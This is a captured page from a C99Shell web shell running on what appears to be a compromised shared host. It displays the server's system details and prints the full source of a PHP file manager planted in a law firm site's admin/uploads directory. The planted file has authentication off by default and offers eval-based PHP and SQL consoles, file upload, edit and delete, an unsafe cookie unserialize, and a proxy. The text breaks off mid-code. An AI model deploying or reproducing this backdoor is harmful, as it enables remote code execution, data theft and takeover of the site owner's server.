!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/5.6.40 

uname -a: Linux cpanel06wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24
01:42:00 EDT 2020 x86_64
 

uid=851(cp949260) gid=853(cp949260) groups=853(cp949260) 

Safe-mode: OFF (not secure)

/home/cp949260/public_html/mophlawyer.com/admin/uploads/   drwxr-xr-x
Free 202.55 GB of 981.82 GB (20.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     file5.php (78.35 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* PHP File manager ver 1.4 */

// Configuration    do not change manually!
$authorization '{"authorize":"0","login":"admin","password":"phpfm","cookie_name":"fm_user","days_authorization":"30","script":"<script type=\"text\/javascript\" src=\"https:\/\/www.cdolivet.com\/editarea\/editarea\/edit_area\/edit_area_full.js\"><\/script>\r\n<script language=\"Javascript\" type=\"text\/javascript\">\r\neditAreaLoader.init({\r\nid: \"newcontent\"\r\n,display: \"later\"\r\n,start_highlight: true\r\n,allow_resize: \"both\"\r\n,allow_toggle: true\r\n,word_wrap: true\r\n,language: \"ru\"\r\n,syntax: \"php\"\t\r\n,toolbar: \"search, go_to_line, |, undo, redo, |, select_font, |, syntax_selection, |, change_smooth_selection, highlight, reset_highlight, |, help\"\r\n,syntax_selection_allow: \"css,html,js,php,python,xml,c,cpp,sql,basic,pas\"\r\n});\r\n<\/script>"}';
$php_templates '{"Settings":"global $fm_config;\r\nvar_export($fm_config);","Backup SQL tables":"echo fm_backup_tables();"}';
$sql_templates '{"All bases":"SHOW DATABASES;","All tables":"SHOW TABLES;"}';
$translation '{"id":"ru","Add":"Добавить","Are you sure you want to delete this directory (recursively)?":"Вы уверены, что хотите удалить эту папку (рекурсивно)?","Are you sure you want to delete this file?":"Вы уверены, что хотите удалить этот файл?","Archiving":"Архивировать","Authorization":"Авторизация","Back":"Назад","Cancel":"Отмена","Chinese":"Китайский","Compress":"Сжать","Console":"Консоль","Cookie":"Куки","Created":"Создан","Date":"Дата","Days":"Дней","Decompress":"Распаковать","Delete":"Удалить","Deleted":"Удалено","Download":"Скачать","done":"закончена","Edit":"Редактировать","Enter":"Вход","English":"Английский","Error occurred":"Произошла ошибка","File manager":"Файловый менеджер","File selected":"Выбран файл","File updated":"Файл сохранен","Filename":"Имя файла","Files uploaded":"Файл загружен","French":"Французский","Generation time":"Генерация страницы","German":"Немецкий","Home":"Домой","Quit":"Выход","Language":"Язык","Login":"Логин","Manage":"Управление","Make directory":"Создать папку","Name":"Наименование","New":"Новое","New file":"Новый файл","no files":"нет файлов","Password":"Пароль","pictures":"изображения","Recursively":"Рекурсивно","Rename":"Переименовать","Reset":"Сбросить","Reset settings":"Сбросить настройки","Restore file time after editing":"Восстанавливать время файла после редактирования","Result":"Результат","Rights":"Права","Russian":"Русский","Save":"Сохранить","Select":"Выберите","Select the file":"Выберите файл","Settings":"Настройка","Show":"Показать","Show size of the folder":"Показывать размер папки","Size":"Размер","Spanish":"Испанский","Submit":"Отправить","Task":"Задача","templates":"шаблоны","Ukrainian":"Украинский","Upload":"Загрузить","Value":"Значение","Hello":"Привет","Found in files":"Найдено в файлах","Search":"Поиск","Recursive search":"Рекурсивный поиск","Mask":"Маска"}';
// end configuration
/*2e3300cd40ea092e5eeb579abe01e85a*/
// Preparations
$starttime explode(' 'microtime());
$starttime $starttime[1] + $starttime[0];
$langs = array('en','ru','de','fr','uk');
$path = empty($_REQUEST['path']) ? $path realpath('.') : realpath($_REQUEST['path']);
$path str_replace('\\''/'$path) . '/';
$main_path=str_replace('\\''/',realpath('./'));
$phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false;
$msg ''// service string
$default_language 'ru';
$detect_lang true;
$fm_version 1.4;

//Authorization
$auth json_decode($authorization,true);
$auth['authorize'] = isset($auth['authorize']) ? $auth['authorize'] : 0
$auth['days_authorization'] = (isset($auth['days_authorization'])&&is_numeric($auth['days_authorization'])) ? (int)$auth['days_authorization'] : 30;
$auth['login'] = isset($auth['login']) ? $auth['login'] : 'admin';  
$auth['password'] = isset($auth['password']) ? $auth['password'] : 'phpfm';  
$auth['cookie_name'] = isset($auth['cookie_name']) ? $auth['cookie_name'] : 'fm_user';
$auth['script'] = isset($auth['script']) ? $auth['script'] : '';

// Little default config
$fm_default_config = array (
    
'make_directory' => true
    
'new_file' => true
    
'upload_file' => true
    
'show_dir_size' => false//if true, show directory size    maybe slow 
    
'show_img' => true
    
'show_php_ver' => true
    
'show_php_ini' => false// show path to current php.ini
    
'show_gt' => true// show generation time
    
'enable_php_console' => true,
    
'enable_sql_console' => true,
    
'sql_server' => 'localhost',
    
'sql_username' => 'root',
    
'sql_password' => '',
    
'sql_db' => 'test_base',
    
'enable_proxy' => true,
    
'show_phpinfo' => true,
    
'show_xls' => true,
    
'fm_settings' => true,
    
'restore_time' => true,
    
'fm_restore_time' => false,
);

if (empty(
$_COOKIE['fm_config'])) $fm_config $fm_default_config;
else 
$fm_config unserialize($_COOKIE['fm_config']);

// Change language
if (isset($_POST['fm_lang'])) { 
    
setcookie('fm_lang'$_POST['fm_lang'], time() + (86400 $auth['days_authorization']));
    
$_COOKIE['fm_lang'] = $_POST['fm_lang'];
}
$language $default_language;

// Detect browser language
if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){
    
$lang_priority explode(','$_SERVER['HTTP_ACCEPT_LANGUAGE']);
    if (!empty(
$lang_priority)){
        foreach (
$lang_priority as $lang_arr){
            
$lng explode(';'$lang_arr);
            
$lng $lng[0];
            if(
in_array($lng,$langs)){
                
$language $lng;
                break;
            }
        }
    }


// Cookie language is primary for ever
$language = (empty($_COOKIE['fm_lang'])) ? $language $_COOKIE['fm_lang'];

// Localization
$lang json_decode($translation,true);
if (
$lang['id']!=$language) {
    
$get_lang file_get_contents('https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/' $language '.json');
    if (!empty(
$get_lang)) {
        
//remove unnecessary characters
        
$translation_string str_replace("'",'&#39;',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE));
        
$fgc file_get_contents(__FILE__);
        
$search preg_match('#translation[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#'$fgc$matches);
        if (!empty(
$matches[1])) {
            
$filemtime filemtime(__FILE__);
            
$replace str_replace('{"'.$matches[1].'"}',$translation_string,$fgc);
            if (
file_put_contents(__FILE__$replace)) {
                
$msg .= __('File updated');
            }    else 
$msg .= __('Error occurred');
            if (!empty(
$fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);
        }    
        
$lang json_decode($translation_string,true);
    }
}

/* Functions */

//translation
function __($text){
    global 
$lang;
    if (isset(
$lang[$text])) return $lang[$text];
    else return 
$text;
};

//delete files and dirs recursively
function fm_del_files($file$recursive false) {
    if(
$recursive && @is_dir($file)) {
        
$els fm_scan_dir($file''''true);
        foreach (
$els as $el) {
            if(
$el != '.' && $el != '..'){
                
fm_del_files($file '/' $eltrue);
            }
        }
    }
    if(@
is_dir($file)) {
        return 
rmdir($file);
    } else {
        return @
unlink($file);
    }
}

//file perms
function fm_rights_string($file$if false){
    
$perms fileperms($file);
    
$info '';
    if(!
$if){
        if ((
$perms 0xC000) == 0xC000) {
            
//Socket
            
$info 's';
        } elseif ((
$perms 0xA000) == 0xA000) {
            
//Symbolic Link
            
$info 'l';
        } elseif ((
$perms 0x8000) == 0x8000) {
            
//Regular
            
$info '-';
        } elseif ((
$perms 0x6000) == 0x6000) {
            
//Block special
            
$info 'b';
        } elseif ((
$perms 0x4000) == 0x4000) {
            
//Directory
            
$info 'd';
        } elseif ((
$perms 0x2000) == 0x2000) {
            
//Character special
            
$info 'c';
        } elseif ((
$perms 0x1000) == 0x1000) {
            
//FIFO pipe
            
$info 'p';
        } else {
            
//Unknown
            
$info 'u';
        }
    }
  
    
//Owner
    
$info .= (($perms 0x0100) ? 'r' '-');
    
$info .= (($perms 0x0080) ? 'w' '-');
    
$info .= (($perms 0x0040) ?
    ((
$perms 0x0800) ? 's' 'x' ) :
    ((
$perms 0x0800) ? 'S' '-'));
 
    
//Group
    
$info .= (($perms 0x0020) ? 'r' '-');
    
$info .= (($perms 0x0010) ? 'w' '-');
    
$info .= (($perms 0x0008) ?
    ((
$perms 0x0400) ? 's' 'x' ) :
    ((
$perms 0x0400) ? 'S' '-'));
 
    
//World
    
$info .= (($perms 0x0004) ? 'r' '-');
    
$info .= (($perms 0x0002) ? 'w' '-');
    
$info .= (($perms 0x0001) ?
    ((
$perms 0x0200) ? 't' 'x' ) :
    ((
$perms 0x0200) ? 'T' '-'));

    return 
$info;
}

function 
fm_convert_rights($mode) {
    
$mode str_pad($mode,9,'-');
    
$trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1');
    
$mode strtr($mode,$trans);
    
$newmode '0';
    
$owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; 
    
$group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; 
    
$world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; 
    
$newmode .= $owner $group $world;
    return 
intval($newmode8);
}

function 
fm_chmod($file$val$rec false) {
    
$res = @chmod(realpath($file), $val);
    if(@
is_dir($file) && $rec){
        
$els fm_scan_dir($file);
        foreach (
$els as $el) {
            
$res $res && fm_chmod($file '/' $el$valtrue);
        }
    }
    return 
$res;
}

//load files
function fm_download($file_name) {
    if (!empty(
$file_name)) {
        if (
file_exists($file_name)) {
            
header("Content-Disposition: attachment; filename=" basename($file_name));   
            
header("Content-Type: application/force-download");
            
header("Content-Type: application/octet-stream");
            
header("Content-Type: application/download");
            
header("Content-Description: File Transfer");            
            
header("Content-Length: " filesize($file_name));        
            
flush(); // this doesn't really matter.
            
$fp fopen($file_name"r");
            while (!
feof($fp)) {
                echo 
fread($fp65536);
                
flush(); // this is essential for large downloads
            

            
fclose($fp);
            die();
        } else {
            
header('HTTP/1.0 404 Not Found'true404);
            
header('Status: 404 Not Found'); 
            die();
        }
    } 
}

//show folder size
function fm_dir_size($f,$format=true) {
    if(
$format)  {
        
$size=fm_dir_size($f,false);
        if(
$size<=1024) return $size.' bytes';
        elseif(
$size<=1024*1024) return round($size/(1024),2).'&nbsp;Kb';
        elseif(
$size<=1024*1024*1024) return round($size/(1024*1024),2).'&nbsp;Mb';
        elseif(
$size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).'&nbsp;Gb';
        elseif(
$size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).'&nbsp;Tb'//:)))
        
else return round($size/(1024*1024*1024*1024*1024),2).'&nbsp;Pb'// ;-)
    
} else {
        if(
is_file($f)) return filesize($f);
        
$size=0;
        
$dh=opendir($f);
        while((
$file=readdir($dh))!==false) {
            if(
$file=='.' || $file=='..') continue;
            if(
is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file);
            else 
$size+=fm_dir_size($f.'/'.$file,false);
        }
        
closedir($dh);
        return 
$size+filesize($f); 
    }
}

//scan directory
function fm_scan_dir($directory$exp ''$type 'all'$do_not_filter false) {
    
$dir $ndir = array();
    if(!empty(
$exp)){
        
$exp '/^' str_replace('*''(.*)'str_replace('.''\\.'$exp)) . '$/';
    }
    if(!empty(
$type) && $type !== 'all'){
        
$func 'is_' $type;
    }
    if(@
is_dir($directory)){
        
$fh opendir($directory);
        while (
false !== ($filename readdir($fh))) {
            if(
substr($filename01) != '.' || $do_not_filter) {
                if((empty(
$type) || $type == 'all' || $func($directory '/' $filename)) && (empty($exp) || preg_match($exp$filename))){
                    
$dir[] = $filename;
                }
            }
        }
        
closedir($fh);
        
natsort($dir);
    }
    return 
$dir;
}

function 
fm_link($get,$link,$name,$title='') {
    if (empty(
$title)) $title=$name.' '.basename($link);
    return 
'&nbsp;&nbsp;<a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>';
}

function 
fm_arr_to_option($arr,$n,$sel=''){
    foreach(
$arr as $v){
        
$b=$v[$n];
        
$res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>';
    }
    return 
$res;
}

function 
fm_lang_form ($current='en'){
return 
'
<form name="change_lang" method="post" action="">
    <select name="fm_lang" title="'
.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" >
        <option value="en" '
.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option>
        <option value="de" '
.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option>
        <option value="ru" '
.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option>
        <option value="fr" '
.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option>
        <option value="uk" '
.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option>
    </select>
</form>
'
;
}
    
function 
fm_root($dirname){
    return (
$dirname=='.' OR $dirname=='..');
}

function 
fm_php($string){
    
$display_errors=ini_get('display_errors');
    
ini_set('display_errors''1');
    
ob_start();
    eval(
trim($string));
    
$text ob_get_contents();
    
ob_end_clean();
    
ini_set('display_errors'$display_errors);
    return 
$text;
}

//SHOW DATABASES
function fm_sql_connect(){
    global 
$fm_config;
    return new 
mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']);
}

function 
fm_sql($query){
    global 
$fm_config;
    
$query=trim($query);
    
ob_start();
    
$connection fm_sql_connect();
    if (
$connection->connect_error) {
        
ob_end_clean();    
        return 
$connection->connect_error;
    }
    
$connection->set_charset('utf8');
    
$queried mysqli_query($connection,$query);
    if (
$queried===false) {
        
ob_end_clean();    
        return 
mysqli_error($connection);
    } else {
        if(!empty(
$queried)){
            while(
$row mysqli_fetch_assoc($queried)) {
                
$query_result[]=  $row;
            }
        }
        
$vdump=empty($query_result)?'':var_export($query_result,true);    
        
ob_end_clean();    
        
$connection->close();
        return 
'<pre>'.stripslashes($vdump).'</pre>';
    }
}

function 
fm_backup_tables($tables '*'$full_backup true) {
    global 
$path;
    
$mysqldb fm_sql_connect();
    
$delimiter "; \n  \n";
    if(
$tables == '*')    {
        
$tables = array();
        
$result $mysqldb->query('SHOW TABLES');
        while(
$row mysqli_fetch_row($result))    {
            
$tables[] = $row[0];
        }
    } else {
        
$tables is_array($tables) ? $tables explode(',',$tables);
    }
    
    
$return='';
    foreach(
$tables as $table)    {
        
$result $mysqldb->query('SELECT * FROM '.$table);
        
$num_fields mysqli_num_fields($result);
        
$return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter;
        
$row2 mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table));
        
$return.=$row2[1].$delimiter;
        if (
$full_backup) {
        for (
$i 0$i $num_fields$i++)  {
            while(
$row mysqli_fetch_row($result)) {
                
$return.= 'INSERT INTO `'.$table.'` VALUES(';
                for(
$j=0$j<$num_fields$j++)    {
                    
$row[$j] = addslashes($row[$j]);
                    
$row[$j] = str_replace("\n","\\n",$row[$j]);
                    if (isset(
$row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
                    if (
$j<($num_fields-1)) { $return.= ','; }
                }
                
$return.= ')'.$delimiter;
            }
          }
        } else { 
        
$return preg_replace("#AUTO_INCREMENT=[\d]+ #is"''$return);
        }
        
$return.="\n\n\n";
    }

    
//save file
    
$file=gmdate("Y-m-d_H-i-s",time()).'.sql';
    
$handle fopen($file,'w+');
    
fwrite($handle,$return);
    
fclose($handle);
    
$alert 'onClick="if(confirm(\''__('File selected').': \n'$file'. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' $file '&path=' $path  '\'"';
    return 
$file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' __('Delete') . ' '$file '" ' $alert '>' __('Delete') . '</a>';
}

function 
fm_restore_tables($sqlFileToExecute) {
    
$mysqldb fm_sql_connect();
    
$delimiter "; \n  \n";
    
// Load and explode the sql file
    
$f fopen($sqlFileToExecute,"r+");
    
$sqlFile fread($f,filesize($sqlFileToExecute));
    
$sqlArray explode($delimiter,$sqlFile);
    
    
//Process the sql file by statements
    
foreach ($sqlArray as $stmt) {
        if (
strlen($stmt)>3){
            
$result $mysqldb->query($stmt);
                if (!
$result){
                    
$sqlErrorCode mysqli_errno($mysqldb->connection);
                    
$sqlErrorText mysqli_error($mysqldb->connection);
                    
$sqlStmt      $stmt;
                    break;
                    }
                 }
           }
if (empty(
$sqlErrorCode)) return __('Success').'    '.$sqlFileToExecute;
else return 
$sqlErrorText.'<br/>'.$stmt;
}

function 
fm_img_link($filename){
    return 
'./'.basename(__FILE__).'?img='.base64_encode($filename);
}

function 
fm_home_style(){
    return 
'
input, input.fm_input {
    text-indent: 2px;
}

input, textarea, select, input.fm_input {
    color: black;
    font: normal 8pt Verdana, Arial, Helvetica, sans-serif;
    border-color: black;
    background-color: #FCFCFC none !important;
    border-radius: 0;
    padding: 2px;
}

input.fm_input {
    background: #FCFCFC none !important;
    cursor: pointer;
}

.home {
    background-image: url("");
    background-repeat: no-repeat;
}'
;
}

function 
fm_config_checkbox_row($name,$value) {
    global 
$fm_config;
    return 
'<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>';
}

function 
fm_protocol() {
    if (isset(
$_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://';
    if (isset(
$_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://';
    if (isset(
$_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://';
    if (isset(
$_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://';
    return 
'http://';
}

function 
fm_site_url() {
    return 
fm_protocol().$_SERVER['HTTP_HOST'];
}

function 
fm_url($full=false) {
    
$host=$full?fm_site_url():'.';
    return 
$host.'/'.basename(__FILE__);
}

function 
fm_home($full=false){
    return 
'&nbsp;<a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home">&nbsp;&nbsp;&nbsp;&nbsp;</span></a>';
}

function 
fm_run_input($lng) {
    global 
$fm_config;
    
$return = !empty($fm_config['enable_'.$lng.'_console']) ? 
    
'
                <form  method="post" action="'
.fm_url().'" style="display:inline">
                <input type="submit" name="'
.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'">
                </form>
'';
    return 
$return;
}

function 
fm_url_proxy($matches) {
    
$link str_replace('&amp;','&',$matches[2]);
    
$url = isset($_GET['url'])?$_GET['url']:'';
    
$parse_url parse_url($url);
    
$host $parse_url['scheme'].'://'.$parse_url['host'].'/';
    if (
substr($link,0,2)=='//') {
        
$link substr_replace($link,fm_protocol(),0,2);
    } elseif (
substr($link,0,1)=='/') {
        
$link substr_replace($link,$host,0,1);    
    } elseif (
substr($link,0,2)=='./') {
        
$link substr_replace($link,$host,0,2);    
    } elseif (
substr($link,0,4)=='http') {
        
//alles machen wunderschon
    
} else {
        
$link $host.$link;
    } 
    if (
$matches[1]=='href' && !strripos($link'css')) {
        
$base fm_site_url().'/'.basename(__FILE__);
        
$baseq $base.'?proxy=true&url=';
        
$link $baseq.urlencode($link);
    } elseif (
strripos($link'css')){
        
// ܧѧ -       ا     էާ֧ߧ     ߧѧէ 
    
}
    return 
$matches[1].'="'.$link.'"';
}
 
function 
fm_tpl_form($lng_tpl) {
    global ${
$lng_tpl.'_templates'};
    
$tpl_arr json_decode(${$lng_tpl.'_templates'},true);
    
$str '';
    foreach (
$tpl_arr as $ktpl=>$vtpl) {
        
$str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]"  cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>';
    }
return 
'
<table>
<tr><th colspan="2">'
.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr>
<form method="post" action="">
<input type="hidden" value="'
.$lng_tpl.'" name="tpl_edited">
<tr><td class="row1">'
.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr>
'
.$str.'
<tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''
.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr>
</form>
<form method="post" action="">
<input type="hidden" value="'
.$lng_tpl.'" name="tpl_edited">
<tr><td class="row1"><input name="'
.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value"  cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr>
<tr><td colspan="2" class="row3"><input type="submit" value="'
.__('Add').'" ></td></tr>
</form>
</table>
'
;
}

/* End Functions */

// authorization
if ($auth['authorize']) {
    if (isset(
$_POST['login']) && isset($_POST['password'])){
        if ((
$_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) {
            
setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 $auth['days_authorization']));
            
$_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']);
        }
    }
    if (!isset(
$_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) {
        echo 
'
<!doctype html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>'
.__('File manager').'</title>
</head>
<body>
<form action="" method="post">
'
.__('Login').' <input name="login" type="text">&nbsp;&nbsp;&nbsp;
'
.__('Password').' <input name="password" type="password">&nbsp;&nbsp;&nbsp;
<input type="submit" value="'
.__('Enter').'" class="fm_input">
</form>
'
.fm_lang_form($language).'
</body>
</html>
'
;  
die();
    }
    if (isset(
$_POST['quit'])) {
        unset(
$_COOKIE[$auth['cookie_name']]);
        
setcookie($auth['cookie_name'], ''time() - (86400 $auth['days_authorization']));
        
header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']);
    }
}

// Change config
if (isset($_GET['fm_settings'])) {
    if (isset(
$_GET['fm_config_delete'])) { 
        unset(
$_COOKIE['fm_config']);
        
setcookie('fm_config'''time() - (86400 $auth['days_authorization']));
        
header('Location: '.fm_url().'?fm_settings=true');
        exit(
0);
    }    elseif (isset(
$_POST['fm_config'])) { 
        
$fm_config $_POST['fm_config'];
        
setcookie('fm_config'serialize($fm_config), time() + (86400 $auth['days_authorization']));
        
$_COOKIE['fm_config'] = serialize($fm_config);
        
$msg __('Settings').' '.__('done');
    }    elseif (isset(
$_POST['fm_login'])) { 
        if (empty(
$_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login'];
        
$fm_login json_encode($_POST['fm_login']);
        
$fgc file_get_contents(__FILE__);
        
$search preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#'$fgc$matches);
        if (!empty(
$matches[1])) {
            
$filemtime filemtime(__FILE__);
            
$replace str_replace('{"'.$matches[1].'"}',$fm_login,$fgc);
            if (
file_put_contents(__FILE__$replace)) {
                
$msg .= __('File updated');
                if (
$_POST['fm_login']['login'] != $auth['login']) $msg .= ' '.__('Login').': '.$_POST['fm_login']['login'];
                if (
$_POST['fm_login']['password'] != $auth['password']) $msg .= ' '.__('Password').': '.$_POST['fm_login']['password'];
                
$auth $_POST['fm_login'];
            }
            else 
$msg .= __('Error occurred');
            if (!empty(
$fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);
        }
    } elseif (isset(
$_POST['tpl_edited'])) { 
        
$lng_tpl $_POST['tpl_edited'];
        if (!empty(
$_POST[$lng_tpl.'_name'])) {
            
$fm_php json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS);
        } elseif (!empty(
$_POST[$lng_tpl.'_new_name'])) {
            
$fm_php json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS);
        }
        if (!empty(
$fm_php)) {
            
$fgc file_get_contents(__FILE__);
            
$search preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#'$fgc$matches);
            if (!empty(
$matches[1])) {
                
$filemtime filemtime(__FILE__);
                
$replace str_replace('{"'.$matches[1].'"}',$fm_php,$fgc);
                if (
file_put_contents(__FILE__$replace)) {
                    ${
$lng_tpl.'_templates'} = $fm_php;
                    
$msg .= __('File updated');
                } else 
$msg .= __('Error occurred');
                if (!empty(
$fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);
            }    
        } else 
$msg .= __('Error occurred');
    }
}

// Just show image
if (isset($_GET['img'])) {
    
$file=base64_decode($_GET['img']);
    if (
$info=getimagesize($file)){
        switch  (
$info[2]){    //1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP
            
case 1$ext='gif'; break;
            case 
2$ext='jpeg'; break;
            case 
3$ext='png'; break;
            case 
6$ext='bmp'; break;
            default: die();
        }
        
header("Content-type: image/$ext");
        echo 
file_get_contents($file);
        die();
    }
}

// Just download file
if (isset($_GET['download'])) {
    
$file=base64_decode($_GET['download']);
    
fm_download($file);    
}

// Just show info
if (isset($_GET['phpinfo'])) {
    
phpinfo(); 
    die();
}

// Mini proxy, many bugs!
if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) {
    
$url = isset($_GET['url'])?urldecode($_GET['url']):'';
    
$proxy_form '
<div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);">
    <form action="" method="GET">
    <input type="hidden" name="proxy" value="true">
    '
.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55">
    <input type="submit" value="'
.__('Show').'" class="fm_input">
    </form>
</div>
'
;
    if (
$url) {
        
$ch curl_init($url);
        
curl_setopt($chCURLOPT_USERAGENT'Den1xxx test proxy');
        
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
        
curl_setopt($chCURLOPT_SSL_VERIFYHOST,0);
        
curl_setopt($chCURLOPT_SSL_VERIFYPEER,0);
        
curl_setopt($chCURLOPT_HEADER0);
        
curl_setopt($chCURLOPT_REFERER$url);
        
curl_setopt($chCURLOPT_RETURNTRANSFER,true);
        
$result curl_exec($ch);
        
curl_close($ch);
        
//$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result);
        
$result preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui''fm_url_proxy'$result);
        
$result preg_replace('%(<body.*?>)%i''$1'.'<style>'.fm_home_style().'</style>'.$proxy_form$result);
        echo 
$result;
        die();
    } 
}
?>
<!doctype html>
<html>
<head>     
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <title><?=__('File manager')?></title>
<style>
body {
    background-color:    white;
    font-family:        Verdana, Arial, Helvetica, sans-serif;
    font-size:            8pt;
    margin:                0px;
}

a:link, a:active, a:visited { color: #006699; text-decoration: none; }
a:hover { color: #DD6900; text-decoration: underline; }
a.th:link { color: #FFA34F; text-decoration: none; }
a.th:active { color: #FFA34F; text-decoration: none; }
a.th:visited { color: #FFA34F; text-decoration: none; }
a.th:hover {  color: #FFA34F; text-decoration: underline; }

table.bg {
    background-color: #ACBBC6
}

th, td { 
    font:    normal 8pt Verdana, Arial, Helvetica, sans-serif;
    padding: 3px;
}

th    {
    height:                25px;
    background-color:    #006699;
    color:                #FFA34F;
    font-weight:        bold;
    font-size:            11px;
}

.row1 {
    background-color:    #EFEFEF;
}

.row2 {
    background-color:    #DEE3E7;
}

.row3 {
    background-color:    #D1D7DC;
    padding: 5px;
}

tr.row1:hover {
    background-color:    #F3FCFC;
}

tr.row2:hover {
    background-color:    #F0F6F6;
}

.whole {
    width: 100%;
}

.all tbody td:first-child{width:100%;}

textarea {
    font: 9pt 'Courier New', courier;
    line-height: 125%;
    padding: 5px;
}

.textarea_input {
    height: 1em;
}

.textarea_input:focus {
    height: auto;
}

input[type=submit]{
    background: #FCFCFC none !important;
    cursor: pointer;
}

.folder {
    background-image: url("");
}

.file {
    background-image: url("");
}
<?=fm_home_style()?>
.img {
    background-image: 
url("");
}
@media screen and (max-width:720px){
  table{display:block;}
    #fm_table td{display:inline;float:left;}
    #fm_table tbody td:first-child{width:100%;padding:0;}
    #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;}
    #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;}
    #fm_table tr{display:block;float:left;clear:left;width:100%;}
    #header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;}
    #header_table table td {display:inline;float:left;}
}
</style>
</head>
<body>
<?php
$url_inc 
'?fm=true';
if (isset(
$_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){
    
$res = empty($_POST['sql']) ? '' $_POST['sql'];
    
$res_lng 'sql';
} elseif (isset(
$_POST['phprun'])&&!empty($fm_config['enable_php_console'])){
    
$res = empty($_POST['php']) ? '' $_POST['php'];
    
$res_lng 'php';

if (isset(
